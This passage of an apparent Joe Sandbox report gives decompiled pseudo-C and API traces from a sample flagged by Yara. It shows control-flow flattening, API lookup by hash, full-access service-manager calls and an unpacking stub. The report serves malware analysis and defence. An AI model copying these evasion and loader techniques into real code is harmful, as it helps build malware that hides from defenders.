                                            							 *0x227de58 = _t9;
                                            						}
                                            						 *_t9(0,  &_v520, 0x104);
                                            						_t7 = 0x17e35087;
                                            						goto L1;
                                            					}
                                            					goto L20;
                                            					L5:
                                            				} while (_t7 != 0x3e45350);
                                            				return 0;
                                            				goto L20;
                                            			}













                                            APIs
                                            • GetCurrentProcess.KERNEL32(00000000,?,00000104), ref: 02279CBA
                                            • QueryFullProcessImageNameW.KERNELBASE(00000000), ref: 02279CBD
                                            • lstrcmpiW.KERNELBASE(?,?), ref: 02279D4E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$CurrentFullImageNameQuerylstrcmpi
                                            • String ID: 79V#
                                            • API String ID: 3605714105-696535739
                                            • Opcode ID: 0e709b48fa2672d7679fce795c5c95366dce201e1cdf672a1c9e9b149f4395c0
                                            • Instruction ID: 49a44879c00cd3996da0c2181877e6e183ea5a996bdfe8ea78d1185ca45c005e
                                            • Opcode Fuzzy Hash: 0e709b48fa2672d7679fce795c5c95366dce201e1cdf672a1c9e9b149f4395c0
                                            • Instruction Fuzzy Hash: C831FC76B6C3049BDB24EBF4B49576B22D6ABC4694F14085EF441CB248DB70DC48CBD2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 531 425ff1-4260a2 GetVersion 533 4260b6-4260b8 call 4171bc 531->533 534 4260a4-4260b3 GetProcessVersion 531->534 536 4260bd-4260fd call 417178 LoadCursorA * 2 533->536 534->533
                                            C-Code - Quality: 90%
                                            			E00425FF1() {
                                            				unsigned int _t18;
                                            				intOrPtr _t19;
                                            				intOrPtr _t26;
                                            				long _t28;
                                            				void* _t40;
                                            				void* _t50;
                                            
                                            				_t50 = 0x439be0;
                                            				_t18 = GetVersion();
                                            				 *0x00439C34 = (_t18 & 0x000000ff) + ((_t18 & 0x000000ff) << 8);
                                            				 *0x00439C38 = _t18 >> 0x1f;
                                            				asm("sbb eax, eax");
                                            				_t40 = 1;
                                            				_t19 = _t18 + 1;
                                            				 *0x00439C3C = _t19;
                                            				 *0x00439C40 = _t40 - _t19;
                                            				 *0x00439C44 = _t19;
                                            				 *0x00439C48 = 0;
                                            				if(_t19 != 0) {
                                            					_t28 = GetProcessVersion(0); // executed
                                            					asm("sbb eax, eax");
                                            					 *((intOrPtr*)(0x439c48)) = _t28 + 1;
                                            				}
                                            				E004171BC(_t50);
                                            				 *((intOrPtr*)(_t50 + 0x24)) = 0;
                                            				E00417178(_t50);
                                            				 *((intOrPtr*)(_t50 + 0x3c)) = LoadCursorA(0, 0x7f02);
                                            				 *((intOrPtr*)(_t50 + 0x40)) = LoadCursorA(0, 0x7f00);
                                            				 *((intOrPtr*)(_t50 + 0x50)) = 0;
                                            				 *((intOrPtr*)(_t50 + 0x44)) = 0;
                                            				_t26 = (0 |  *((intOrPtr*)(_t50 + 0x5c)) != 0x00000000) + 1;
                                            				 *((intOrPtr*)(_t50 + 0x10)) = _t26;
                                            				 *((intOrPtr*)(_t50 + 0x14)) = _t26;
                                            				return _t50;
                                            			}










                                            APIs
                                            • GetVersion.KERNEL32(?,?,?,00425FEC), ref: 00426068
                                            • GetProcessVersion.KERNELBASE(00000000,?,?,?,00425FEC), ref: 004260A5
                                            • LoadCursorA.USER32 ref: 004260D3
                                            • LoadCursorA.USER32 ref: 004260DE
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CursorLoadVersion$Process
                                            • String ID:
                                            • API String ID: 2246821583-0
                                            • Opcode ID: 6ae578300c1fd388cde0746a419bc37b446ef5b23384ceea8f5f1ab27520ebf6
                                            • Instruction ID: b544fc3fc140862069c0e5c3025fa315675d99968a939774a25cb551b1266f67
                                            • Opcode Fuzzy Hash: 6ae578300c1fd388cde0746a419bc37b446ef5b23384ceea8f5f1ab27520ebf6
                                            • Instruction Fuzzy Hash: 2C113AB1A047608FD728DF3A989452ABBE5FB48704751493FE18BC6B50D778A441CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 539 4080e7-4080f8 540 40812a-40814e RtlAllocateHeap 539->540 541 4080fa-408117 HeapReAlloc 539->541 542 408150-408168 VirtualAlloc 540->542 543 40817a-40817c 540->543 541->543 544 408119-408125 541->544 545 40816a-408174 HeapFree 542->545 546 40817e-408193 542->546 547 408195-408197 543->547 544->540 545->543 546->547
                                            C-Code - Quality: 100%
                                            			E004080E7() {
                                            				signed int _t15;
                                            				void* _t17;
                                            				void* _t19;
                                            				void* _t25;
                                            				signed int _t26;
                                            				void* _t27;
                                            				intOrPtr* _t29;
                                            
                                            				_t15 =  *0x43b634; // 0x1
                                            				_t26 =  *0x43b624; // 0x10
                                            				if(_t15 != _t26) {
                                            					L3:
                                            					_t27 =  *0x43b638; // 0x22d05a8
                                            					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
                                            					_t17 = RtlAllocateHeap( *0x43b63c, 8, 0x41c4); // executed
                                            					 *(_t29 + 0x10) = _t17;
                                            					if(_t17 == 0) {
                                            						L6:
                                            						return 0;
                                            					}
                                            					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4); // executed
                                            					 *(_t29 + 0xc) = _t19;
                                            					if(_t19 != 0) {
                                            						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
                                            						 *_t29 = 0;
                                            						 *((intOrPtr*)(_t29 + 4)) = 0;
                                            						 *0x43b634 =  *0x43b634 + 1;
                                            						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
                                            						return _t29;
                                            					}
                                            					HeapFree( *0x43b63c, 0,  *(_t29 + 0x10));
                                            					goto L6;
                                            				}
                                            				_t2 = _t26 * 4; // 0x60
                                            				_t25 = HeapReAlloc( *0x43b63c, 0,  *0x43b638, _t26 + _t2 + 0x50 << 2);
                                            				if(_t25 == 0) {
                                            					goto L6;
                                            				}
                                            				 *0x43b624 =  *0x43b624 + 0x10;
                                            				 *0x43b638 = _t25;
                                            				_t15 =  *0x43b634; // 0x1
                                            				goto L3;
                                            			}











                                            APIs
                                            • HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,00407EAF,00000000,?,?,?,004063F8), ref: 0040810F
                                            • RtlAllocateHeap.NTDLL(00000008,000041C4,00000000,00000000,00407EAF,00000000,?,?,?,004063F8), ref: 00408143
                                            • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,004063F8), ref: 0040815D
                                            • HeapFree.KERNEL32(00000000,?,?,004063F8), ref: 00408174
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Heap$Alloc$AllocateFreeVirtual
                                            • String ID:
                                            • API String ID: 1005975451-0
                                            • Opcode ID: 1221898d1fef6688b0745aebfb4c1bb27194800098e600c79b41635115f9dbec
                                            • Instruction ID: 7ee1ac0be71f7df2db9aeb831ea59f9b1f4a4243ff11ed4a701e61ad5814e4f6
                                            • Opcode Fuzzy Hash: 1221898d1fef6688b0745aebfb4c1bb27194800098e600c79b41635115f9dbec
                                            • Instruction Fuzzy Hash: 4A115870200301AFC7318F18EC46E6A7BB6FB947207505A3DF296DA1B1C770A813CB89
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 548 22796b0-22796c7 549 22796d0-22796d5 548->549 550 2279833-2279838 549->550 551 22796db 549->551 552 22798d6-22798db 550->552 553 227983e 550->553 554 22797e7-227982e 551->554 555 22796e1-22796e6 551->555 560 2279931-2279936 552->560 561 22798dd-22798e4 552->561 558 2279844-2279849 553->558 559 2279948-227994f 553->559 554->549 556 22797cd-22797d2 555->556 557 22796ec 555->557 556->560 564 22797d8-22797e2 call 2277ab0 556->564 565 22796f2-22796f7 557->565 566 227979c-22797a3 557->566 567 227987e-22798d1 558->567 568 227984b-2279850 558->568 570 2279951-2279967 call 2273f20 call 2273e80 559->570 571 227996c-2279977 559->571 560->549 569 227993c-2279947 560->569 562 22798e6-22798fc call 2273f20 call 2273e80 561->562 563 2279901-2279910 OpenSCManagerW 561->563 562->563 576 2279927-227992c 563->576 577 2279912-2279922 563->577 564->549 574 227974e-2279755 565->574 575 22796f9-22796fe 565->575 578 22797a5-22797bb call 2273f20 call 2273e80 566->578 579 22797c0-22797c8 566->579 567->549 568->560 580 2279856-2279867 call 22742f0 568->580 570->571 583 227997b-227998d call 2273070 571->583 588 2279757-227976d call 2273f20 call 2273e80 574->588 589 2279772-2279797 call 2273d10 574->589 575->560 585 2279704-227970c 575->585 576->549 577->549 578->579 579->549 605 2279990-227999b 580->605 606 227986d-2279879 580->606 583->605 593 227970e-2279726 call 2273f20 call 2273e80 585->593 594 227972c-227973e 585->594 588->589 589->549 593->594 612 2279742-227974c 594->612 606->549 612->549
                                            C-Code - Quality: 73%
                                            			E022796B0() {
                                            				char _v524;
                                            				unsigned int _v528;
                                            				char _v536;
                                            				void* _v544;
                                            				void* __ebx;
                                            				void* _t44;
                                            				void* _t47;
                                            				void* _t48;
                                            				void* _t51;
                                            				void* _t53;
                                            				void* _t61;
                                            				void* _t62;
                                            				void* _t66;
                                            				void* _t69;
                                            				intOrPtr _t71;
                                            				void* _t73;
                                            				intOrPtr _t79;
                                            				void* _t87;
                                            				void* _t90;
                                            				signed int _t103;
                                            				void* _t116;
                                            				void* _t117;
                                            				void* _t118;
                                            				void* _t121;
                                            				void* _t122;
                                            
                                            				_t117 = _v528;
                                            				_t44 = 0x290b7473;
                                            				_t116 = 0;
                                            				_t2 = _t116 + 1; // 0x1
                                            				_t79 = _t2;
                                            				goto L1;
                                            				do {
                                            					while(1) {
                                            						L1:
                                            						_t121 = _t44 - 0x185037e0;
                                            						if(_t121 > 0) {
                                            							break;
                                            						}
                                            						if(_t121 == 0) {
                                            							_v528 = 0x9fb;
                                            							_v528 = _v528 ^ 0xe4a1a680;
                                            							_v528 = _v528 << 0xd;
                                            							_v528 = _v528 + 0xffffacfd;
                                            							_t80 = _v528;
                                            							_t44 = 0xac9ce62;
                                            							_v528 = (_v528 - (0x2f684bdb * _t80 >> 0x20) >> 1) + (0x2f684bdb * _t80 >> 0x20) >> 4;
                                            							_v528 = _v528 << 5;
                                            							_v528 = _v528 ^ 0x3febe949;
                                            							continue;
                                            						} else {
                                            							_t122 = _t44 - 0xac9ce62;
                                            							if(_t122 > 0) {
                                            								__eflags = _t44 - 0x143d843a;
                                            								if(_t44 != 0x143d843a) {
                                            									goto L32;
                                            								} else {
                                            									E02277AB0(_t118);
                                            									_t44 = 0x28458a2;
                                            									continue;
                                            								}
                                            							} else {
                                            								if(_t122 == 0) {
                                            									_t66 =  *0x227ddb8;
                                            									__eflags = _t66;
                                            									if(_t66 == 0) {
                                            										_t66 = E02273E80(_t79, E02273F20(0x667fdee), 0x505cb3fe, _t118);
                                            										 *0x227ddb8 = _t66;
                                            									}
                                            									 *_t66(_t117);
                                            									_t44 = 0x67ba340;
                                            									continue;
                                            								} else {
                                            									if(_t44 == 0x28458a2) {
                                            										_t69 =  *0x227de58;
                                            										__eflags = _t69;
                                            										if(_t69 == 0) {
                                            											_t69 = E02273E80(_t79, E02273F20(0xbb398380), 0xb1aefb5, _t118);
                                            											 *0x227de58 = _t69;
                                            										}
                                            										 *_t69(0,  &_v524, 0x104);
                                            										_t71 = E02273D10( &_v536);
                                            										_t87 =  *0x227e2ec; // 0x4d9470
                                            										 *((intOrPtr*)(_t87 + 0x48)) = _t71;
                                            										_t44 = 0x311c267c;
                                            										continue;
                                            									} else {
                                            										if(_t44 != 0x67ba340) {
                                            											goto L32;
                                            										} else {
                                            											_t90 =  *0x227df38; // 0x75243620
                                            											if(_t90 == 0) {
                                            												_t90 = E02273E80(_t79, E02273F20(0xf9c30097), 0x62c574d8, _t118);
                                            												 *0x227df38 = _t90;
                                            											}
                                            											_t73 =  *0x227e2ec; // 0x4d9470
                                            											 *_t90(0, _v528, 0, 0, _t73 + 0x5c); // executed
                                            											_t44 = 0x143d843a;
                                            											_t116 =  ==  ? _t79 : _t116;
                                            											continue;
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						L38:
                                            					}
                                            					__eflags = _t44 - 0x311c267c;
                                            					if(__eflags > 0) {
                                            						__eflags = _t44 - 0x37104f21;
                                            						if(_t44 != 0x37104f21) {
                                            							goto L32;
                                            						} else {
                                            							__eflags =  *0x227e0f4;
                                            							if( *0x227e0f4 == 0) {
                                            								 *0x227e0f4 = E02273E80(_t79, E02273F20(0x667fdee), 0x7f692adf, _t118);
                                            							}
                                            							_t47 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                            							_t117 = _t47;
                                            							__eflags = _t117;
                                            							if(_t117 == 0) {
                                            								_t44 = 0x25965b99;
                                            							} else {
                                            								_t48 =  *0x227e2ec; // 0x4d9470
                                            								 *((intOrPtr*)(_t48 + 0x268)) = _t79;
                                            								_t44 = 0x185037e0;
                                            							}
                                            							goto L1;
                                            						}
                                            					} else {
                                            						if(__eflags == 0) {
                                            							_t51 =  *0x227df38;
                                            							__eflags = _t51;
                                            							if(_t51 == 0) {
                                            								_t51 = E02273E80(_t79, E02273F20(0xf9c30097), 0x62c574d8, _t118);
                                            								 *0x227df38 = _t51;
                                            							}
                                            							 *_t51(0, 0x25, 0, 0,  &_v524);
                                            							_t53 =  *0x227e2ec; // 0x4d9470
                                            							__eflags = _t53 + 0x10;
                                            							E02273070(_t53 + 0x10);
                                            							goto L37;
                                            						} else {
                                            							__eflags = _t44 - 0x25965b99;
                                            							if(_t44 == 0x25965b99) {
                                            								_v528 = 0x4b7f;
                                            								_v528 = _v528 + 0xffffece0;
                                            								_t103 = (_v528 - (0x3521cfb3 * _v528 >> 0x20) >> 1) + (0x3521cfb3 * _v528 >> 0x20) >> 5;
                                            								_v528 = _t103;
                                            								_v528 = (_t103 << 5) + _v528;
                                            								_v528 = _v528 >> 2;
                                            								_v528 = _v528 ^ 0x000008d8;
                                            								_t61 =  *0x227e2ec; // 0x4d9470
                                            								 *((intOrPtr*)(_t61 + 0x3c)) = 0x2277c60;
                                            								_t44 = 0x67ba340;
                                            								goto L1;
                                            							} else {
                                            								__eflags = _t44 - 0x290b7473;
                                            								if(_t44 != 0x290b7473) {
                                            									goto L32;
                                            								} else {
                                            									_t62 = E022742F0(_t79, 0x480);
                                            									 *0x227e2ec = _t62;
                                            									__eflags = _t62;
                                            									if(_t62 == 0) {
                                            										L37:
                                            										return _t116;
                                            									} else {
                                            										 *((intOrPtr*)(_t62 + 0x38)) = E02277C70;
                                            										_t44 = 0x37104f21;
                                            										goto L1;
                                            									}
                                            								}
                                            							}
                                            						}
                                            					}
                                            					goto L38;
                                            					L32:
                                            					__eflags = _t44 - 0x20400186;
                                            				} while (_t44 != 0x20400186);
                                            				return _t116;
                                            				goto L38;
                                            			}





























                                            APIs
                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,2564BE4F), ref: 0227990A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ManagerOpen
                                            • String ID: 6$u$I?
                                            • API String ID: 1889721586-3653535747
                                            • Opcode ID: 5cdf0d28f381992c3cc55da6a7b426ba034306667e0c93ae23e55174c1049429
                                            • Instruction ID: e05f5455cf6ff810fb1d32c99633985c12d4a5992b8a77a43b21cd5b239a4732
                                            • Opcode Fuzzy Hash: 5cdf0d28f381992c3cc55da6a7b426ba034306667e0c93ae23e55174c1049429
                                            • Instruction Fuzzy Hash: E261E57172C3019FDB28EEE9948972F73A5AB80314F40891DE556CB398DB74D844CF82
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph (function 22799a0; legend: Executed / Not Executed)
                                            C-Code - Quality: 60%
                                            			E022799A0() {
                                            				short _v520;
                                            				void* _v524;
                                            				void* _v528;
                                            				char _v532;
                                            				void* _t11;
                                            				intOrPtr* _t12;
                                            				void* _t18;
                                            				intOrPtr* _t20;
                                            				intOrPtr* _t25;
                                            				intOrPtr* _t27;
                                            				intOrPtr _t31;
                                            				intOrPtr* _t33;
                                            				intOrPtr* _t38;
                                            				intOrPtr _t41;
                                            				void* _t45;
                                            				intOrPtr* _t59;
                                            				intOrPtr _t63;
                                            				void* _t79;
                                            				void* _t80;
                                            				void* _t82;
                                            
                                            				_t79 = _v528;
                                            				_t11 = 0x1e395e13;
                                            				while(1) {
                                            					_t82 = _t11 - 0x1f18c325;
                                            					if(_t82 > 0) {
                                            						goto L24;
                                            					}
                                            					L2:
                                            					if(_t82 == 0) {
                                            						_t25 =  *0x227de58;
                                            						if(_t25 == 0) {
                                            							_t25 = E02273E80(_t45, E02273F20(0xbb398380), 0xb1aefb5, _t80);
                                            							 *0x227de58 = _t25;
                                            						}
                                            						 *_t25(0,  &_v520, 0x104);
                                            						_t27 =  *0x227dc3c;
                                            						if(_t27 == 0) {
                                            							_t27 = E02273E80(_t45, E02273F20(0x7539f5a2), 0x3f129d89, _t80);
                                            							 *0x227dc3c = _t27;
                                            						}
                                            						 *((short*)( *_t27( &_v532))) = 0;
                                            						_t11 = 0x32a2459b;
                                            						continue;
                                            					} else {
                                            						if(_t11 == 0x3932e9b) {
                                            							_t31 =  *0x227e2f0; // 0x4c2de8
                                            							_v528 =  *(_t31 + 0x3c);
                                            							_t33 =  *0x227db04;
                                            							_v524 = _t79;
                                            							if(_t33 == 0) {
                                            								_t33 = E02273E80(_t45, E02273F20(0xbb398380), 0x7436592b, _t80);
                                            								 *0x227db04 = _t33;
                                            							}
                                            							_push(0xffffffff);
                                            							_push(0);
                                            							_push( &_v528);
                                            							_push(2);
                                            							if( *_t33() == 0) {
                                            								L37:
                                            								return 0;
                                            							} else {
                                            								_t11 =  ==  ? 0x18584b48 : 0x3932e9b;
                                            								continue;
                                            							}
                                            						} else {
                                            							if(_t11 == 0x18584b48) {
                                            								if(E02279C10(_t80) == 0) {
                                            									_t38 =  *0x227dcdc; // 0x0
                                            									if(_t38 == 0) {
                                            										_t38 = E02273E80(_t45, E02273F20(0xbb398380), 0xcaaeebbc, _t80);
                                            										 *0x227dcdc = _t38;
                                            									}
                                            									 *_t38(_t79);
                                            									L14:
                                            									_t11 = 0x3932e9b;
                                            								} else {
                                            									_t59 =  *0x227dff4; // 0x0
                                            									if(_t59 == 0) {
                                            										_t59 = E02273E80(_t45, E02273F20(0xbb398380), 0x1186b083, _t80);
                                            										 *0x227dff4 = _t59;
                                            									}
                                            									_t41 =  *0x227e2f0; // 0x4c2de8
                                            									 *_t59( *((intOrPtr*)(_t41 + 0x3c)));
                                            									_t11 = 0x2713957b;
                                            								}
                                            								continue;
                                            							} else {
                                            								if(_t11 == 0x1e395e13) {
                                            									_t11 = 0x1f18c325;
                                            									continue;
                                            									do {
                                            										while(1) {
                                            											_t82 = _t11 - 0x1f18c325;
                                            											if(_t82 > 0) {
                                            												goto L24;
                                            											}
                                            											goto L2;
                                            										}
                                            										goto L24;
                                            									} while (_t11 != 0x2707225a);
                                            									return 0;
                                            								}
                                            							}
                                            						}
                                            					}
                                            					L38:
                                            					L24:
                                            					if(_t11 == 0x2713957b) {
                                            						_t12 =  *0x227df90; // 0x0
                                            						if(_t12 == 0) {
                                            							_t12 = E02273E80(_t45, E02273F20(0xbb398380), 0x5f1f4281, _t80);
                                            							 *0x227df90 = _t12;
                                            						}
                                            						 *_t12(_t79);
                                            						goto L37;
                                            					} else {
                                            						if(_t11 != 0x32a2459b) {
                                            							goto L32;
                                            						} else {
                                            							if( *0x227dca8 == 0) {
                                            								 *0x227dca8 = E02273E80(_t45, E02273F20(0xbb398380), 0x39bd4dfe, _t80);
                                            							}
                                            							_t18 = FindFirstChangeNotificationW( &_v520, 0, 1); // executed
                                            							_t79 = _t18;
                                            							if(E02279C10(_t80) == 0) {
                                            								goto L14;
                                            							} else {
                                            								_t20 =  *0x227dff4; // 0x0
                                            								if(_t20 == 0) {
                                            									_t20 = E02273E80(_t45, E02273F20(0xbb398380), 0x1186b083, _t80);
                                            									 *0x227dff4 = _t20;
                                            								}
                                            								_t63 =  *0x227e2f0; // 0x4c2de8
                                            								 *_t20( *((intOrPtr*)(_t63 + 0x3c)));
                                            								_t11 = 0x2713957b;
                                            							}
                                            							continue;
                                            						}
                                            					}
                                            					goto L38;
                                            				}
                                            			}























                                            0x022799e8
                                            0x022799e1
                                            0x022799d6
                                            0x00000000
                                            0x02279b2f
                                            0x02279b34
                                            0x02279bd0
                                            0x02279bd7
                                            0x02279bea
                                            0x02279bef
                                            0x02279bef
                                            0x02279bf5
                                            0x00000000
                                            0x02279b3a
                                            0x02279b3f
                                            0x00000000
                                            0x02279b41
                                            0x02279b48
                                            0x02279b60
                                            0x02279b60
                                            0x02279b6e
                                            0x02279b70
                                            0x02279b79
                                            0x00000000
                                            0x02279b7f
                                            0x02279b7f
                                            0x02279b86
                                            0x02279b99
                                            0x02279b9e
                                            0x02279b9e
                                            0x02279ba3
                                            0x02279bac
                                            0x02279bae
                                            0x02279bae
                                            0x00000000
                                            0x02279b79
                                            0x02279b3f
                                            0x00000000
                                            0x02279b34

                                            APIs
                                            • FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 02279B6E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ChangeFindFirstNotification
                                            • String ID: +Y6t$-L
                                            • API String ID: 1065410024-808303179
                                            • Opcode ID: 90a2904bc069aaf95eb322deaff9bc82051c9507bf97ea9378c96807fd1f188b
                                            • Instruction ID: c77e2df2d531fbca7a4ee7924a64244cacccdb5c9d3c0ce127b3115ec0f8d9df
                                            • Opcode Fuzzy Hash: 90a2904bc069aaf95eb322deaff9bc82051c9507bf97ea9378c96807fd1f188b
                                            • Instruction Fuzzy Hash: C6516370B2D3029BDB24EAF5A89466F32A76F85344B10585DF441CB288EF74C954CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 697 426474-42649f SetErrorMode * 2 call 424bfb * 2 702 4264c0-4264ca call 424bfb 697->702 703 4264a1-4264bb call 4264d7 697->703 707 4264d1-4264d4 702->707 708 4264cc call 412710 702->708 703->702 708->707
                                            C-Code - Quality: 100%
                                            			E00426474(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
                                            				signed short _t13;
                                            				void* _t16;
                                            				intOrPtr _t18;
                                            				void* _t20;
                                            				intOrPtr _t29;
                                            
                                            				_t13 = SetErrorMode(0); // executed
                                            				SetErrorMode(_t13 | 0x00008001); // executed
                                            				_t16 = E00424BFB();
                                            				_t29 = _a4;
                                            				 *((intOrPtr*)(_t16 + 8)) = _t29;
                                            				 *((intOrPtr*)(_t16 + 0xc)) = _t29;
                                            				_t18 =  *((intOrPtr*)(E00424BFB() + 4));
                                            				_t31 = _t18;
                                            				if(_t18 != 0) {
                                            					 *((intOrPtr*)(_t18 + 0x68)) = _t29;
                                            					 *((intOrPtr*)(_t18 + 0x6c)) = _a8;
                                            					 *((intOrPtr*)(_t18 + 0x70)) = _a12;
                                            					_t10 =  &_a16; // 0x406468
                                            					 *((intOrPtr*)(_t18 + 0x74)) =  *_t10;
                                            					E004264D7(_t18, _t31);
                                            				}
                                            				if( *((char*)(E00424BFB() + 0x14)) == 0) {
                                            					E00412710();
                                            				}
                                            				_t20 = 1;
                                            				return _t20;
                                            			}









                                            APIs
                                            • SetErrorMode.KERNELBASE(00000000,00000000,0041845B,00000000,00000000,00000000,00000000,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000,00406468), ref: 0042647D
                                            • SetErrorMode.KERNELBASE(00000000,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000,00406468,00000000), ref: 00426484
                                              • Part of subcall function 004264D7: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00426508
                                              • Part of subcall function 004264D7: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 004265A9
                                              • Part of subcall function 004264D7: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004265D6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
                                            • String ID: hd@
                                            • API String ID: 3389432936-3469257913
                                            • Opcode ID: cd2bf83e0aada7a78a64cd33e34dd8ad1fec100a5d14c2182ee5260116b148ae
                                            • Instruction ID: 56c02cd2a0ca812c609797d7f3c2b0aa536ab85d6a731917afc158bbbb4402dc
                                            • Opcode Fuzzy Hash: cd2bf83e0aada7a78a64cd33e34dd8ad1fec100a5d14c2182ee5260116b148ae
                                            • Instruction Fuzzy Hash: F2F04F71A043205FD714FF25E484B0A7BD4AF44714F06844FF4889B3A2CBB8E841CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 710 222002d-222009e call 2220456 * 6; API calls: 22200e4-2220105 GetNativeSystemInfo, 2220107-222012d VirtualAlloc, 2220388-222039d VirtualProtect; 22203b2-22203c7 call 22427b0
                                            APIs
                                            • GetNativeSystemInfo.KERNELBASE(?,?,?,?,02220005), ref: 022200E9
                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,02220005), ref: 02220111
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2220000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocInfoNativeSystemVirtual
                                            • String ID:
                                            • API String ID: 2032221330-0
                                            • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                            • Instruction ID: e241159be38bf5143375c73197749071cdf282d31060fffc00978ade5ab58021
                                            • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                            • Instruction Fuzzy Hash: 4BD11671A14327AFD714CF99C88076AB7E0FFA4308F04852DE885CB245E776EA49CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 75%
                                            			E02271E60(void* __ecx, void** __edx) {
                                            				void* _v48;
                                            				void* _v64;
                                            				void* _v72;
                                            				void* __ebx;
                                            				void* __ebp;
                                            				void* _t14;
                                            				intOrPtr* _t16;
                                            				intOrPtr* _t23;
                                            				void* _t26;
                                            				void* _t32;
                                            				void _t33;
